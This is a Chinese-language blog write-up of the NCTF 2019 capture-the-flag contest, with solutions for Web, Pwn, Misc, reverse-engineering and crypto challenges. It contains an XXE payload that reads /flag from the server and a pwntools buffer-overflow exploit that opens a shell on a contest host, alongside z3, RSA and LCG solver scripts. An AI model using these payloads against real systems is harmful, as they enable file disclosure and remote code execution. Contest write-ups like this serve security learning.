NCTF 2019 WriteUp

怎么说呢,今天换了新的博客主题,我也想从现在开始写博客了,毕竟都鸽了一年了,
上周末南邮CTF开赛,我也就去划了个水,怎么说呢,只能感觉自己太弱了…

下面就是几个我做出来的题的题解,望指正。

Web

Fake XML cookbook

题目提示flag在/flag里,用XML外部实体注入(XXE)读取该文件。(修复方法是让服务端的XML解析器禁用DTD和外部实体解析。)

<!-- Declares an external general entity "flag" whose SYSTEM identifier is file:///flag.
     A parser that resolves external entities substitutes that file's contents for the
     entity reference inside <username>; a parser configured with DTD and
     external entity processing disabled does not. -->
<!DOCTYPE a [
<!ENTITY flag SYSTEM "file:///flag">
]>
<user>
<username>&flag;</username>
<password>111</password>
</user>

Pwn

hello_pwn

pwntools就行

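import pwn

# Connect to the challenge service and print everything it sends before it
# closes the connection. The host string uses plain ASCII quotes: typographic
# quotes (“ ”) are a SyntaxError in Python.
c = pwn.remote("139.129.76.65", 50003)
# recvall() only returns the data; print it so it is visible when run as a script.
print(c.recvall())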

pwn me 100 years! (Ⅰ)

IDA分析可知read处存在溢出,所以:

# python2
import pwn

conn = pwn.remote("139.129.76.65", 50004)

# Discard the four lines the service prints before it asks for input.
remaining = 4
while remaining > 0:
    conn.readline()
    remaining -= 1

# Answer layout: "yes" + NUL, twelve more NUL bytes (16 bytes in total),
# followed by one packed 32-bit value.
# NOTE(review): the write-up attributes this to an overflowing read(); presumably
# the first 16 bytes fill the input buffer and the trailing dword lands on the
# value the program compares afterwards - confirm against the disassembly.
answer = "yes\0" + "\0" * 12
answer += pwn.p32(0x66666666)  # 0x66666666 == 1717986918
conn.sendline(answer)

conn.interactive()

getshell后ls,cat flag

MISC

a_good_idea

binwalk分析图片

foremost还原,打开zip,解压

根据hint,用StegSolve对两张图做对比分析,两图相减时出现二维码

扫描出flag

pip install

去pip库里下载一下pip包,然后看setup.py

base64解码,即可得flag

What’s this

wireshark追踪流,得到What1s7his.zip
打开zip,有密码,猜测为伪加密,改00 00 后解压得到txt
猜测每一行为base64编码,解码得
然后这题我就没做出来。

RE

DEBUG

IDA调试,出结果

签到

比较输入的字符串(flag)与内存中一块数组的值是否相等,总共49个方程,每7个一组,然后用z3解方程就行了

# python3
from z3 import *

# Target values read from the binary. The table holds 50 entries; only the
# first 49 (seven groups of seven) are referenced below.
arr = [
    0x4884,0x91C4,0x7D35,0x81FE,0x5DB9,0x817F,0x3B90,
    0x3597,0x8559,0x6AFF,0x6FDF,0x4815,0x6F31,0x3060,
    0x512C,0x0B01D,0x8BF3,0x917B,0x65B5,0x99F1,0x44AF,
    0x5159,0x0ADBA,0x8942,0x9032,0x653E,0x9803,0x4508,
    0x52E3,0x0AB9F,0x90D0,0x99BF,0x6C91,0x0A1E7,0x46B2,
    0x5357,0x0B454,0x972A,0x98AC,0x7215,0x9FD1,0x4AAD,
    0x551A,0x0B5ED,0x95B2,0x0A039,0x7272,0x0A991,0x4CC7,
    0x0F,
]

# One 8-bit unknown per input character.
# NOTE(review): with 8-bit BitVecs z3 evaluates both sides modulo 256, so only
# the low byte of each 16-bit target is compared - confirm this is intended,
# or widen the unknowns and constrain them to the byte range.
a1 = [BitVec('a%d' % i, 8) for i in range(49)]
solver = Solver()

# Each group of seven characters is tied to seven targets by linear equations.
for base in range(0, 49, 7):
    x0, x1, x2, x3, x4, x5, x6 = a1[base:base + 7]
    solver.add(
        34 * x3 + 12 * x0 + 53 * x1 + 6 * x2 + 58 * x4 + 36 * x5 + x6 == arr[base],
        27 * x4 + 73 * x3 + 12 * x2 + 83 * x0 + 85 * x1 + 96 * x5 + 52 * x6 == arr[base + 1],
        24 * x2 + 78 * x0 + 53 * x1 + 36 * x3 + 86 * x4 + 25 * x5 + 46 * x6 == arr[base + 2],
        78 * x1 + 39 * x0 + 52 * x2 + 9 * x3 + 62 * x4 + 37 * x5 + 84 * x6 == arr[base + 3],
        48 * x4 + 6 * x1 + 23 * x0 + 14 * x2 + 74 * x3 + 12 * x5 + 83 * x6 == arr[base + 4],
        15 * x5 + 48 * x4 + 92 * x2 + 85 * x1 + 27 * x0 + 42 * x3 + 72 * x6 == arr[base + 5],
        # NOTE(review): this equation has no x4 term as transcribed - verify against the binary.
        26 * x5 + 67 * x3 + 6 * x1 + 4 * x0 + 3 * x2 + 68 * x6 == arr[base + 6],
    )

if solver.check() != sat:
    raise RuntimeError()

m = solver.model()
# print(m)

# Read the solved bytes back in order and join them into the flag string.
flag = ''.join(chr(m[var].as_long()) for var in a1)
print(flag)

Crypto

childRSA

用yafu分解n可以得到p、q,于是phin=(p-1)(q-1)可以算出;e已给定,所以d能求出来,然后解密即可。

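# python2
from Crypto.Util.number import inverse

# The two prime factors of the modulus, as recovered by factoring it.
p = 178449493212694205742332078583256205058672290603652616240227340638730811945224947826121772642204629335108873832781921390308501763661154638696935732709724016546955977529088135995838497476350749621442719690722226913635772410880516639651363626821442456779009699333452616953193799328647446968707045304702547915799734431818800374360377292309248361548868909066895474518333089446581763425755389837072166970684877011663234978631869703859541876049132713490090720408351108387971577438951727337962368478059295446047962510687695047494480605473377173021467764495541590394732685140829152761532035790187269724703444386838656193674253139
q = 184084121540115307597161367011014142898823526027674354555037785878481711602257307508985022577801782788769786800015984410443717799994642236194840684557538917849420967360121509675348296203886340264385224150964642958965438801864306187503790100281099130863977710204660546799128755418521327290719635075221585824217487386227004673527292281536221958961760681032293340099395863194031788435142296085219594866635192464353365034089592414809332183882423461536123972873871477755949082223830049594561329457349537703926325152949582123419049073013144325689632055433283354999265193117288252918515308767016885678802217366700376654365502867

# The modulus is the product of the two factors; pow() below needs it.
n = p * q
phin = (p-1)*(q-1)
e = 65537
# Private exponent: inverse of e modulo phi(n).
d = inverse(e, phin)

c = 26308018356739853895382240109968894175166731283702927002165268998773708335216338997058314157717147131083296551313334042509806229853341488461087009955203854253313827608275460592785607739091992591431080342664081962030557042784864074533380701014585315663218783130162376176094773010478159362434331787279303302718098735574605469803801873109982473258207444342330633191849040553550708886593340770753064322410889048135425025715982196600650740987076486540674090923181664281515197679745907830107684777248532278645343716263686014941081417914622724906314960249945105011301731247324601620886782967217339340393853616450077105125391982689986178342417223392217085276465471102737594719932347242482670320801063191869471318313514407997326350065187904154229557706351355052446027159972546737213451422978211055778164578782156428466626894026103053360431281644645515155471301826844754338802352846095293421718249819728205538534652212984831283642472071669494851823123552827380737798609829706225744376667082534026874483482483127491533474306552210039386256062116345785870668331513725792053302188276682550672663353937781055621860101624242216671635824311412793495965628876036344731733142759495348248970313655381407241457118743532311394697763283681852908564387282605279108
m = pow(c,d,n)

# "%x" yields the hex digits without the "0x" prefix or Python 2's trailing "L";
# pad to an even number of digits so the hex decode cannot fail on a leading
# zero nibble.
plaintext_hex = "%x" % m
if len(plaintext_hex) % 2:
    plaintext_hex = "0" + plaintext_hex
print plaintext_hex.decode("hex")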

LCG

只能说我太弱了

# python3
from Crypto.Util.number import inverse, isPrime
from math import gcd
import hashlib
import pwn

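def PoW(prefix, digest):
    """Solve the service's proof of work by brute force.

    Args:
        prefix: hex string of the known leading bytes.
        digest: hex SHA-256 digest the full message must hash to.

    Returns:
        The hex string of prefix plus the 3-byte big-endian suffix whose
        SHA-256 equals *digest*, or None if none of the 256**3 suffixes match.
    """
    prefix = bytes.fromhex(prefix)
    for i in range(256**3):
        guess = prefix + i.to_bytes(3, 'big')
        if hashlib.sha256(guess).hexdigest() == digest:
            return guess.hex()
    # Search space exhausted without a match.
    return None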

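def _read_int(tube):
    """Read one line from *tube* and parse its last space-separated field as an int.

    int() is used instead of eval(): the line comes from the remote service, and
    eval() would execute whatever expression the peer chose to send on the
    machine running this script. Assumes the service prints plain decimal
    integers.
    """
    return int(tube.readline().decode().split(" ")[-1])


def _skip_lines(tube, count):
    """Discard *count* lines of banner or prompt output from *tube*."""
    for _ in range(count):
        tube.readline()


def _seed_before(state, a, b, N):
    """Invert one LCG step: return s such that (a * s + b) % N == state % N."""
    return (state - b) * inverse(a, N) % N


if __name__ == "__main__":
    c = pwn.remote("139.129.76.65", 60001)
    _skip_lines(c, 8)
    # The last field of each of the next two lines, minus the trailing newline.
    digest = c.readline().decode().split(" ")[-1][:-1]
    prefix = c.readline().decode().split(" ")[-1][:-1]
    answer = PoW(prefix, digest)
    if answer is None:
        raise SystemExit("proof of work: no 3-byte suffix matched the digest")
    c.sendline(answer)
    _skip_lines(c, 18)

    # Challenge 1: N, a, b and the first state are given.
    N = _read_int(c)  # N
    a = _read_int(c)  # a
    b = _read_int(c)  # b
    st = _read_int(c)  # st
    c.sendline(str(_seed_before(st, a, b, N)))
    _skip_lines(c, 6)

    # Challenge 2: b is hidden; two consecutive states give b = st2 - a * st1.
    N = _read_int(c)  # N
    a = _read_int(c)  # a
    st1 = _read_int(c)  # st1
    st2 = _read_int(c)  # st2
    b = (st2 - a * st1) % N
    c.sendline(str(_seed_before(st1, a, b, N)))
    _skip_lines(c, 5)

    # Challenge 3: a and b are hidden; a = (st3 - st2) / (st2 - st1) mod N.
    N = _read_int(c)  # N
    st1 = _read_int(c)  # st1
    st2 = _read_int(c)  # st2
    st3 = _read_int(c)  # st3
    a = (st3 - st2) * inverse(st2 - st1, N) % N
    b = (st2 - a * st1) % N
    c.sendline(str(_seed_before(st1, a, b, N)))
    _skip_lines(c, 5)

    # Challenge 4: N is hidden as well.
    # Rough idea: combine the state differences in pairs so that each
    # expression is a multiple of N, take their gcd to recover N, and then
    # proceed as in challenge 3.
    st1 = _read_int(c)  # st1
    st2 = _read_int(c)  # st2
    st3 = _read_int(c)  # st3
    st4 = _read_int(c)  # st4
    st5 = _read_int(c)  # st5
    st6 = _read_int(c)  # st6
    # Consecutive differences form a geometric sequence modulo N, so both
    # expressions below are congruent to 0 modulo N.
    g1 = (st5 - st4) * (st4 - st3) - (st6 - st5) * (st3 - st2)
    g2 = (st6 - st4) * (st4 - st2) - (st5 - st3) * (st5 - st3)
    N = gcd(g1, g2)
    print(N)
    # The gcd may be a small multiple of N: strip every factor below 100,
    # repeatedly, so prime powers such as 4 or 9 are removed too. The "N and"
    # guard stops the loop if the gcd came out as 0.
    for i in range(2, 100):
        while N and N % i == 0:
            N = N // i
    print(isPrime(N))
    # Only answer when the candidate is a 256-bit prime ("0b" + 256 digits).
    if isPrime(N) and len(bin(N)) == 258:
        a = (st3 - st2) * inverse(st2 - st1, N) % N
        b = (st2 - a * st1) % N
        c.sendline(str(_seed_before(st1, a, b, N)))
    c.interactive()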

然后得到flag

作者

uchkks

发布于

2019-11-26

更新于

2019-11-26
